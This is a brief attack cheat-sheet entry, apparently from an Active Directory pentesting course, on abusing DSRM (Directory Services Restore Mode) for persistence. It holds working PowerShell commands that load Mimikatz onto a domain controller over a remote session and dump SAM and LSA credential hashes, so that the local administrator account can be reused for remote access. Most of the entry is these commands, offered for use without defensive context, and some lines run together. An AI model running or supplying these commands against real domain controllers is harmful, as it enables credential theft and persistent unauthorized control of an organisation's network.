DSRM
If we have admin privileges on a DC, we can dump local admin hash and then activate this local admin user to remotely access it.
DSRM (Directory Services Restore Mode)
# Copy InvokeMimi to DC
$sess = New-PSSession dcorp-dc
Enter-PSSession -Session $sess
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dcInvoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dcLast updated